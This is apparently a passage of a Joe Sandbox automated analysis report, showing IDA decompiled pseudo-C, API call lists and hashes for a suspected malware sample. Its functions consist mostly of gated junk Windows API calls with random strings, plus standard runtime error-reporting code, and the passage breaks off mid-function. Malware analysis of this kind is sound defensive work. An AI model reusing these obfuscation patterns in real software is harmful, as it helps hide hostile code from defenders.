                            				}
                            				_t28 =  *0x6328e4; // 0x1e30c0
                            				_t29 = E00409990( *0x615d40, _t28, 0x427010);
                            				_t82 = 0;
                            				do {
                            					if( *0x6328e4 == 0x10) {
                            						GlobalFix( &_v3448);
                            					}
                            					if(_t82 == 0x1e673) {
                            						_t29 = E00409C50(_t29);
                            					}
                            					_t82 = _t82 + 1;
                            				} while (_t82 < 0x3e79e);
                            				_v3468 = 0xdd9a7;
                            				do {
                            					if( *0x6328e4 == 0xc01) {
                            						TerminateProcess(0, 0);
                            						GetUserDefaultLangID();
                            						WritePrivateProfileStringA(0, 0, 0, 0);
                            						GetNamedPipeHandleStateW(0,  &_v3460,  &_v3452,  &_v3464,  &_v3456,  &_v2048, 0);
                            					}
                            					_t18 =  &_v3468;
                            					 *_t18 = _v3468 - 1;
                            				} while ( *_t18 != 0);
                            				E004088F0();
                            				if( *0x6328e4 == 0x1144) {
                            					GetModuleHandleW(L"tacixololid");
                            					__imp__SetDllDirectoryW(0);
                            					FormatMessageA(0, 0, 0, 0, 0, 0, 0);
                            					FindResourceW(0, 0, 0);
                            					__imp__ReleaseActCtx(0);
                            					__imp__GetCalendarInfoA(0, 0, 0,  &_v3080, 0,  &_v3468);
                            					FindFirstChangeNotificationW(L"misetanu", 0, 0);
                            					InterlockedDecrement( &_v3484);
                            					GetCommandLineA();
                            					GetProfileSectionA("rujovigofghj",  &_v2080, 0);
                            					GlobalFix(0);
                            					_push(0);
                            					VerifyVersionInfoA( &(_v3436.hStdInput), 0, 0);
                            				}
                            				return 0;
                            			}























                            0x00409d57
                            0x00409d5e
                            0x00409d72
                            0x00409d80
                            0x00409d80
                            0x00409d8d
                            0x00409d93
                            0x00409d99
                            0x00409da7
                            0x00409db7
                            0x00409db7
                            0x00409dbd
                            0x00409dcd
                            0x00409dd5
                            0x00409de1
                            0x00409def
                            0x00409df6
                            0x00409dfe
                            0x00409e05
                            0x00409e14
                            0x00409e20
                            0x00409e2e
                            0x00409e2e
                            0x00409e34
                            0x00409e3d
                            0x00000000
                            0x00000000
                            0x00409e3f
                            0x00409e45
                            0x00409e49
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00409e49
                            0x00409e4f
                            0x00409e61
                            0x00409e66
                            0x00409e70
                            0x00409e77
                            0x00409e7e
                            0x00409e7e
                            0x00409e8a
                            0x00409e8c
                            0x00409e8c
                            0x00409e91
                            0x00409e92
                            0x00409eb2
                            0x00409ec0
                            0x00409eca
                            0x00409ed0
                            0x00409ed2
                            0x00409edc
                            0x00409efe
                            0x00409efe
                            0x00409f00
                            0x00409f00
                            0x00409f00
                            0x00409f07
                            0x00409f1a
                            0x00409f25
                            0x00409f2d
                            0x00409f41
                            0x00409f4d
                            0x00409f55
                            0x00409f70
                            0x00409f7f
                            0x00409f8a
                            0x00409f90
                            0x00409fa5
                            0x00409fad
                            0x00409fb3
                            0x00409fc1
                            0x00409fc1
                            0x00409fcf

                            APIs
                            • GetLastError.KERNEL32 ref: 00409D80
                            • SetConsoleTextAttribute.KERNEL32(00000000,00000000), ref: 00409D93
                            • DebugBreak.KERNEL32 ref: 00409D99
                            • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00409DA7
                            • WriteProfileSectionW.KERNEL32(Wupezoxaxozumiw gifubedi,Huzulibopabuda nuzahokecuxel muhu), ref: 00409DB7
                            • GetLastError.KERNEL32 ref: 00409DBD
                            • CopyFileA.KERNEL32 ref: 00409DD5
                            • GetSystemWow64DirectoryW.KERNEL32(?,00000000), ref: 00409DE1
                            • GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 00409DEF
                            • DisconnectNamedPipe.KERNEL32 ref: 00409DFE
                            • GetStartupInfoA.KERNEL32(?), ref: 00409E05
                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00409E14
                            • HeapValidate.KERNEL32(00000000,00000000,00000000), ref: 00409E20
                            • GetVersionExW.KERNEL32(?), ref: 00409E2E
                            • GlobalFix.KERNEL32 ref: 00409E7E
                            • TerminateProcess.KERNEL32(00000000,00000000,?,001E30C0,00427010), ref: 00409ED0
                            • GetUserDefaultLangID.KERNEL32 ref: 00409ED2
                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00409EDC
                            • GetNamedPipeHandleStateW.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00409EFE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: Info$ErrorLastNamedPipeProfileWrite$AttributeBreakCalendarCompareConsoleCopyDebugDefaultDirectoryDisconnectExchangeFileGlobalHandleHeapInterlockedLangPrivateProcessSectionStartupStateStringSystemTerminateTextUserValidateVersionWow64
                            • String ID: Huzulibopabuda nuzahokecuxel muhu$Wupezoxaxozumiw gifubedi$misetanu$rujovigofghj$tacixololid$u7
                            • API String ID: 2442499186-1539711763
                            • Opcode ID: e0246d367eba01d43645638c602113fba38ba3b6bafc5c5649b76c83eb628ada
                            • Instruction ID: 1b602e0e853446f7e8c69fbb1d69449c88d6502fc05553ed6c1a5d54e148400d
                            • Opcode Fuzzy Hash: e0246d367eba01d43645638c602113fba38ba3b6bafc5c5649b76c83eb628ada
                            • Instruction Fuzzy Hash: 39519671244380EFE310DB90DE4AF9A73A4BB44B01F50452AF389BA4F1D7B46944CB6E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 84%
                            			E00409990(intOrPtr _a4, unsigned int _a8, intOrPtr _a12) {
                            				short _v2048;
                            				struct _WIN32_FIND_DATAW _v3072;
                            				struct _OSVERSIONINFOW _v3352;
                            				struct _TIME_ZONE_INFORMATION _v3524;
                            				struct _DCB _v3704;
                            				long _v3712;
                            				struct _COMMTIMEOUTS _v3732;
                            				void* _v3736;
                            				void* _v3740;
                            				long _v3748;
                            				struct _COORD _v3752;
                            				char _v3756;
                            				intOrPtr _v3760;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				unsigned int _t37;
                            				int _t38;
                            				void* _t61;
                            				intOrPtr* _t78;
                            
                            				if( *0x6328e4 == 0x516) {
                            					VerLanguageNameA(0,  &_v3072, 0);
                            					SetDefaultCommConfigW(0, 0, 0);
                            					_v3752.Y = 0;
                            					_v3752.X = 0;
                            					ReadConsoleOutputCharacterW(0,  &_v2048, 0, _v3752,  &_v3748);
                            				}
                            				_t37 = _a8 >> 3;
                            				if(_t37 > 0) {
                            					_t61 = VerifyVersionInfoA;
                            					_t78 = __imp__QueryDepthSList;
                            					_v3752 = _a4;
                            					_v3748 = _t37;
                            					do {
                            						if( *0x6328e4 == 0x29) {
                            							_v3732.ReadTotalTimeoutMultiplier = 0;
                            							_v3732.ReadTotalTimeoutConstant = 0;
                            							_v3732.WriteTotalTimeoutMultiplier = 0;
                            							_v3732.WriteTotalTimeoutConstant = 0;
                            							_v3732.ReadIntervalTimeout = 0;
                            							BuildCommDCBAndTimeoutsA(0,  &_v3704,  &_v3732);
                            							CopyFileExW(0, 0, 0, 0, 0, 0);
                            							GetCompressedFileSizeW(0,  &_v3712);
                            						}
                            						if( *0x6328e4 == 0xe1b) {
                            							FindNextFileW(0,  &_v3072);
                            							SetEvent(0);
                            						}
                            						if( *0x6328e4 == 0x1c) {
                            							_v3740 = 0;
                            							_v3736 = 0;
                            							 *_t78( &_v3740);
                            							_push(0);
                            							VerifyVersionInfoA( &(_v3704.EofChar), 0, 0);
                            							GetVersionExW( &_v3352);
                            							SetLastError(0);
                            							TerminateProcess(0, 0);
                            							GetTimeZoneInformation( &_v3524);
                            						}
                            						_push(_a12);
                            						_push(_v3752);
                            						_t38 = L004097E0(_t61, _t78, 0);
                            						if( *0x6328e4 == 0x4fa) {
                            							_v3752.X = 0;
                            							_v3752.Y = 0;
                            							_t38 = FillConsoleOutputCharacterA(0, 0, 0, _v3752,  &(_v3732.WriteTotalTimeoutMultiplier));
                            						}
                            						_v3760 = _v3760 + 8;
                            						_t34 =  &_v3756;
                            						 *_t34 = _v3756 - 1;
                            					} while ( *_t34 != 0);
                            					return _t38;
                            				}
                            				return _t37;
                            			}
























                            0x004099a3
                            0x004099af
                            0x004099b7
                            0x004099c1
                            0x004099cb
                            0x004099df
                            0x004099df
                            0x004099ec
                            0x004099f1
                            0x004099ff
                            0x00409a0d
                            0x00409a13
                            0x00409a17
                            0x00409a20
                            0x00409a27
                            0x00409a2f
                            0x00409a33
                            0x00409a37
                            0x00409a3b
                            0x00409a46
                            0x00409a4a
                            0x00409a56
                            0x00409a62
                            0x00409a62
                            0x00409a72
                            0x00409a7d
                            0x00409a84
                            0x00409a84
                            0x00409a91
                            0x00409a98
                            0x00409a9c
                            0x00409aa0
                            0x00409aa2
                            0x00409aaa
                            0x00409ab4
                            0x00409ab7
                            0x00409abf
                            0x00409acd
                            0x00409acd
                            0x00409ade
                            0x00409adf
                            0x00409ae0
                            0x00409aef
                            0x00409afa
                            0x00409aff
                            0x00409b0c
                            0x00409b0c
                            0x00409b12
                            0x00409b17
                            0x00409b17
                            0x00409b17
                            0x00000000
                            0x00409b24
                            0x00409b2c

                            APIs
                            • VerLanguageNameA.KERNEL32(00000000,?,00000000), ref: 004099AF
                            • SetDefaultCommConfigW.KERNEL32(00000000,00000000,00000000), ref: 004099B7
                            • ReadConsoleOutputCharacterW.KERNEL32(00000000,?,00000000,?,?), ref: 004099DF
                            • BuildCommDCBAndTimeoutsA.KERNEL32(00000000,?,?), ref: 00409A4A
                            • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409A56
                            • GetCompressedFileSizeW.KERNEL32(00000000,?), ref: 00409A62
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00409A7D
                            • SetEvent.KERNEL32(00000000), ref: 00409A84
                            • QueryDepthSList.KERNEL32(?), ref: 00409AA0
                            • VerifyVersionInfoA.KERNEL32(?,00000000,00000000,00000000), ref: 00409AAA
                            • GetVersionExW.KERNEL32(?), ref: 00409AB4
                            • SetLastError.KERNEL32(00000000), ref: 00409AB7
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00409ABF
                            • GetTimeZoneInformation.KERNEL32(?), ref: 00409ACD
                            • FillConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 00409B0C
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: File$CharacterCommConsoleOutputVersion$BuildCompressedConfigCopyDefaultDepthErrorEventFillFindInfoInformationLanguageLastListNameNextProcessQueryReadSizeTerminateTimeTimeoutsVerifyZone
                            • String ID:
                            • API String ID: 2993308821-0
                            • Opcode ID: 7de2656ca8efdd4406fc587640fde4eda95cc19ce904693b03613efa173e1e6e
                            • Instruction ID: 44dbf4e76faf01295172065a2e4e91539d578242f17f452664ddf0d1d4f2c262
                            • Opcode Fuzzy Hash: 7de2656ca8efdd4406fc587640fde4eda95cc19ce904693b03613efa173e1e6e
                            • Instruction Fuzzy Hash: D5411B71505391AFC324DF64DD489DFBBE9FF89340F00492EF189A2260D7749A49CBAA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E00416CA0(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                            				intOrPtr _v0;
                            				void* _v804;
                            				intOrPtr _v808;
                            				intOrPtr _v812;
                            				intOrPtr _t6;
                            				long _t15;
                            				intOrPtr _t19;
                            				intOrPtr _t20;
                            				intOrPtr _t21;
                            				intOrPtr _t22;
                            				intOrPtr _t23;
                            				intOrPtr _t24;
                            				intOrPtr _t25;
                            				intOrPtr* _t29;
                            				void* _t34;
                            
                            				_t25 = __esi;
                            				_t24 = __edi;
                            				_t22 = __edx;
                            				_t20 = __ecx;
                            				_t19 = __ebx;
                            				_t6 = __eax;
                            				_t34 = _t20 -  *0x60a7a4; // 0x859ba81c
                            				if(_t34 == 0) {
                            					asm("repe ret");
                            				}
                            				 *0x633108 = _t6;
                            				 *0x633104 = _t20;
                            				 *0x633100 = _t22;
                            				 *0x6330fc = _t19;
                            				 *0x6330f8 = _t25;
                            				 *0x6330f4 = _t24;
                            				 *0x633120 = ss;
                            				 *0x633114 = cs;
                            				 *0x6330f0 = ds;
                            				 *0x6330ec = es;
                            				 *0x6330e8 = fs;
                            				 *0x6330e4 = gs;
                            				asm("pushfd");
                            				_pop( *0x633118);
                            				 *0x63310c =  *_t29;
                            				 *0x633110 = _v0;
                            				 *0x63311c =  &_a4;
                            				 *0x633058 = 0x10001;
                            				 *0x63300c =  *0x633110;
                            				 *0x633000 = 0xc0000409;
                            				 *0x633004 = 1;
                            				_t21 =  *0x60a7a4; // 0x859ba81c
                            				_v812 = _t21;
                            				_t23 =  *0x60a7a8; // 0x7a6457e3
                            				_v808 = _t23;
                            				 *0x633050 = IsDebuggerPresent();
                            				_push(1);
                            				E00413410(_t12);
                            				SetUnhandledExceptionFilter(0);
                            				_t15 = UnhandledExceptionFilter(0x407730);
                            				if( *0x633050 == 0) {
                            					_push(1);
                            					E00413410(_t15);
                            				}
                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                            			}


















                            0x00416ca0
                            0x00416ca0
                            0x00416ca0
                            0x00416ca0
                            0x00416ca0
                            0x00416ca0
                            0x00416ca0
                            0x00416ca6
                            0x00416ca8
                            0x00416ca8
                            0x0041cb0b
                            0x0041cb10
                            0x0041cb16
                            0x0041cb1c
                            0x0041cb22
                            0x0041cb28
                            0x0041cb2e
                            0x0041cb35
                            0x0041cb3c
                            0x0041cb43
                            0x0041cb4a
                            0x0041cb51
                            0x0041cb58
                            0x0041cb59
                            0x0041cb62
                            0x0041cb6a
                            0x0041cb72
                            0x0041cb7d
                            0x0041cb8c
                            0x0041cb91
                            0x0041cb9b
                            0x0041cba5
                            0x0041cbab
                            0x0041cbb1
                            0x0041cbb7
                            0x0041cbc3
                            0x0041cbc8
                            0x0041cbca
                            0x0041cbd4
                            0x0041cbdf
                            0x0041cbec
                            0x0041cbee
                            0x0041cbf0
                            0x0041cbf5
                            0x0041cc0d

                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 0041CBBD
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041CBD4
                            • UnhandledExceptionFilter.KERNEL32(00407730), ref: 0041CBDF
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0041CBFD
                            • TerminateProcess.KERNEL32(00000000), ref: 0041CC04
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID: Wdz
                            • API String ID: 2579439406-4092399554
                            • Opcode ID: 99f2fac6f835401b5b2a8059eaa70c239e18d383c4da92ebd9d64a3d76b696d4
                            • Instruction ID: a7021b985360c7d106344e9c48b261806b493fa352ecee04b80a63ae0aae519c
                            • Opcode Fuzzy Hash: 99f2fac6f835401b5b2a8059eaa70c239e18d383c4da92ebd9d64a3d76b696d4
                            • Instruction Fuzzy Hash: DA2105B8904324DFC304DF55FD866847BB2FB58315F00A06AE80997370E7B996848FDA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00411C80() {
                            
                            				SetUnhandledExceptionFilter(E00411C10);
                            				return 0;
                            			}



                            0x00411c8a
                            0x00411c93

                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(Function_00011C10), ref: 00411C8A
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 725cc683a5feb6d52b7d72325b4c8d8bf9e378337467f8ac0abda314484ba784
                            • Instruction ID: 3d2526e74eda86157a82295036fda31cb56e836406d6ed952cb8b4859e4f5d1e
                            • Opcode Fuzzy Hash: 725cc683a5feb6d52b7d72325b4c8d8bf9e378337467f8ac0abda314484ba784
                            • Instruction Fuzzy Hash: 57B012312C424867470033E26D099427B8CD5C47643510471F20DD1020F975949040D9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.256540868.00000000022FB000.00000040.00000800.00020000.00000000.sdmp, Offset: 022FB000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_22fb000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                            • Instruction ID: dc931bdacffa71626f5a91983fface84e42c49803b017a91bf40ab42e60966b7
                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                            • Instruction Fuzzy Hash: F21186723501019FD754DF95DC80FA6B3DAFB8D364B198069EE04CB316D675E841CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E0041732E(struct _OVERLAPPED* __ecx) {
                            				CHAR* _t147;
                            				long _t160;
                            				void* _t164;
                            				void* _t167;
                            				void* _t171;
                            				struct _OVERLAPPED* _t179;
                            				struct _OVERLAPPED* _t197;
                            				struct _OVERLAPPED** _t198;
                            				void* _t208;
                            				void* _t209;
                            				void* _t259;
                            				void* _t260;
                            				void* _t261;
                            				void* _t262;
                            				signed int _t263;
                            				void* _t265;
                            				void* _t267;
                            				void* _t269;
                            				void* _t271;
                            
                            				_t210 = __ecx;
                            				if(InterlockedIncrement(0x60b390) <= 0) {
                            					if( *((intOrPtr*)(_t263 + 0x18)) != 0) {
                            						 *(_t263 - 0x5034) = 0;
                            						 *(_t263 - 0x5038) =  *(L0040EC70(_t210));
                            						 *(L0040EC70( *(L0040EC70(_t210)))) = 0;
                            						_t236 = _t263 - 0x5030;
                            						_t197 = E0041CAD0(_t263 - 0x5030, 0x1000, 0xfeb,  *((intOrPtr*)(_t263 + 0x18)),  *((intOrPtr*)(_t263 + 0x1c)));
                            						_t265 = _t265 + 0x14;
                            						 *(_t263 - 0x5034) = _t197;
                            						if( *(_t263 - 0x5034) < 0) {
                            							E0040D870( *((intOrPtr*)(L0040EC70(_t236))), 0x16, 0x22, L"(*_errno())", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x12d, 0);
                            							_t265 = _t265 + 0x20;
                            						}
                            						_t198 = L0040EC70(_t236);
                            						_t210 =  *(_t263 - 0x5038);
                            						 *_t198 =  *(_t263 - 0x5038);
                            						if( *(_t263 - 0x5034) < 0) {
                            							E0040DDE0(E0040D960(_t208, _t210, _t261, _t263 - 0x5030, 0x1000, "_CrtDbgReport: String too long or IO Error"), _t199, L"strcpy_s(szUserMessage, 4096, \"_CrtDbgReport: String too long or IO Error\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x130, 0);
                            							_t265 = _t265 + 0x24;
                            						}
                            					}
                            					if( *(_t263 + 8) == 2) {
                            						if( *((intOrPtr*)(_t263 + 0x18)) == 0) {
                            							 *((intOrPtr*)(_t263 - 0x5068)) = "Assertion failed!";
                            						} else {
                            							 *((intOrPtr*)(_t263 - 0x5068)) = "Assertion failed: ";
                            						}
                            						_t210 = _t263 - 0x4030;
                            						E0040DDE0(E0040D960(_t208, _t263 - 0x4030, _t261, _t263 - 0x4030, 0x1000,  *((intOrPtr*)(_t263 - 0x5068))), _t192, L"strcpy_s(szLineMessage, 4096, szFormat ? \"Assertion failed: \" : \"Assertion failed!\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x135, 0);
                            						_t265 = _t265 + 0x24;
                            					}
                            					E0040DDE0(E0041A2A0(_t208, _t210, _t259, _t261, _t263 - 0x4030, 0x1000, _t263 - 0x5030), _t136, L"strcat_s(szLineMessage, 4096, szUserMessage)", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x137, 0);
                            					_t267 = _t265 + 0x24;
                            					if( *(_t263 + 8) == 2) {
                            						_t234 =  *(_t263 + 8);
                            						if(( *(0x60b394 +  *(_t263 + 8) * 4) & 0x00000001) != 0) {
                            							E0040DDE0(E0041A2A0(_t208, _t234, _t259, _t261, _t263 - 0x4030, 0x1000, "\r"), _t189, L"strcat_s(szLineMessage, 4096, \"\\r\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x13c, 0);
                            							_t267 = _t267 + 0x24;
                            						}
                            						_t210 = _t263 - 0x4030;
                            						E0040DDE0(E0041A2A0(_t208, _t263 - 0x4030, _t259, _t261, _t263 - 0x4030, 0x1000, "\n"), _t186, L"strcat_s(szLineMessage, 4096, \"\\n\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x13d, 0);
                            						_t267 = _t267 + 0x24;
                            					}
                            					if( *(_t263 + 0xc) == 0) {
                            						E0040DDE0(E0040D960(_t208, _t263 - 0x4030, _t261, _t263 - 0x3028, 0x1000, _t263 - 0x4030), _t138, L"strcpy_s(szOutMessage, 4096, szLineMessage)", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x14b, 0);
                            						_t269 = _t267 + 0x24;
                            					} else {
                            						 *(_t263 - 0x503c) = 0;
                            						 *(_t263 - 0x5040) =  *(L0040EC70(_t210));
                            						 *(L0040EC70(_t210)) = 0;
                            						_push(_t263 - 0x4030);
                            						_t233 =  *(_t263 + 0x10);
                            						_push( *(_t263 + 0x10));
                            						_t179 = E00416AA0( *(_t263 + 0x10), _t263 - 0x3028, 0x1000, 0xfff, "%s(%d) : %s",  *(_t263 + 0xc));
                            						_t269 = _t267 + 0x1c;
                            						 *(_t263 - 0x503c) = _t179;
                            						if( *(_t263 - 0x503c) < 0) {
                            							E0040D870( *(L0040EC70(_t233)), 0x16, 0x22, L"(*_errno())", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x144, 0);
                            							_t269 = _t269 + 0x20;
                            						}
                            						 *(L0040EC70(_t233)) =  *(_t263 - 0x5040);
                            						if( *(_t263 - 0x503c) < 0) {
                            							E0040DDE0(E0040D960(_t208, _t233, _t261, _t263 - 0x3028, 0x1000, "_CrtDbgReport: String too long or IO Error"), _t182, L"strcpy_s(szOutMessage, 4096, \"_CrtDbgReport: String too long or IO Error\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x147, 0);
                            							_t269 = _t269 + 0x24;
                            						}
                            					}
                            					 *(_t263 - 0x5044) = 0;
                            					 *(_t263 - 0x5048) = 0;
                            					_t240 = _t263 - 0x5044;
                            					 *(_t263 - 0x5048) = E0041D6C0(_t263 - 0x5044, _t263 - 0x2020, 0x1000, _t263 - 0x3028, 0xffffffff);
                            					E0040D870( *(_t263 - 0x5048), 0x16, 0x22, L"e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x150, 0);
                            					_t271 = _t269 + 0x34;
                            					if( *(_t263 - 0x5048) != 0) {
                            						E0040DDE0(E00418B70(_t208, _t263 - 0x2020, _t259, _t261, _t263 - 0x2020, 0x1000, L"_CrtDbgReport: String too long or Invalid characters in String"), _t173, L"wcscpy_s(szOutMessage2, 4096, L\"_CrtDbgReport: String too long or Invalid characters in String\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x152, 0);
                            						_t271 = _t271 + 0x24;
                            					}
                            					if( *0x6333fc != 0 ||  *0x6333f8 != 0) {
                            						 *(_t263 - 0x5050) = 0;
                            						 *(_t263 - 0x504c) = 0;
                            						L0040E140(0xf);
                            						_t271 = _t271 + 4;
                            						 *(_t263 - 4) = 1;
                            						_t240 =  *0x6333fc;
                            						 *(_t263 - 0x5050) =  *0x6333fc;
                            						while( *(_t263 - 0x5050) != 0) {
                            							 *(_t263 - 0x5054) = 0;
                            							_t240 =  *(_t263 - 0x5050);
                            							_t171 =  *(( *(_t263 - 0x5050))[0xc])( *(_t263 + 8), _t263 - 0x3028, _t263 - 0x5054);
                            							_t271 = _t271 + 0xc;
                            							if(_t171 == 0) {
                            								 *(_t263 - 0x5050) = ( *(_t263 - 0x5050))[4];
                            								continue;
                            							}
                            							 *(_t263 - 0x302c) = 1;
                            							 *(_t263 - 0x2024) =  *(_t263 - 0x5054);
                            							break;
                            						}
                            						if( *(_t263 - 0x302c) != 0) {
                            							L43:
                            							 *(_t263 - 4) = 0;
                            							E004178C5();
                            							goto L44;
                            						}
                            						_t240 =  *0x6333f8;
                            						 *(_t263 - 0x504c) =  *0x6333f8;
                            						while( *(_t263 - 0x504c) != 0) {
                            							 *(_t263 - 0x5058) = 0;
                            							_t240 =  *(_t263 - 0x504c);
                            							_t167 =  *(( *(_t263 - 0x504c))[0xc])( *(_t263 + 8), _t263 - 0x2020, _t263 - 0x5058);
                            							_t271 = _t271 + 0xc;
                            							if(_t167 == 0) {
                            								 *(_t263 - 0x504c) = ( *(_t263 - 0x504c))[4];
                            								continue;
                            							}
                            							 *(_t263 - 0x302c) = 1;
                            							 *(_t263 - 0x2024) =  *(_t263 - 0x5058);
                            							goto L43;
                            						}
                            						goto L43;
                            					} else {
                            						L44:
                            						if( *(_t263 - 0x302c) == 0) {
                            							if( *0x6333f4 != 0) {
                            								 *(_t263 - 0x505c) = 0;
                            								_t240 = _t263 - 0x505c;
                            								_t164 =  *0x6333f4( *(_t263 + 8), _t263 - 0x3028, _t263 - 0x505c);
                            								_t271 = _t271 + 0xc;
                            								if(_t164 != 0) {
                            									 *(_t263 - 0x302c) = 1;
                            									_t240 =  *(_t263 - 0x505c);
                            									 *(_t263 - 0x2024) =  *(_t263 - 0x505c);
                            								}
                            							}
                            							if( *(_t263 - 0x302c) == 0) {
                            								if(( *(0x60b394 +  *(_t263 + 8) * 4) & 0x00000001) != 0 &&  *(0x60b3a0 +  *(_t263 + 8) * 4) != 0xffffffff) {
                            									_t160 = E0040DC40(_t263 - 0x3028);
                            									_t271 = _t271 + 4;
                            									WriteFile( *(0x60b3a0 +  *(_t263 + 8) * 4), _t263 - 0x3028, _t160, _t263 - 0x5060, 0);
                            								}
                            								if(( *(0x60b394 +  *(_t263 + 8) * 4) & 0x00000002) != 0) {
                            									OutputDebugStringA(_t263 - 0x3028);
                            								}
                            								_t240 =  *(_t263 + 8);
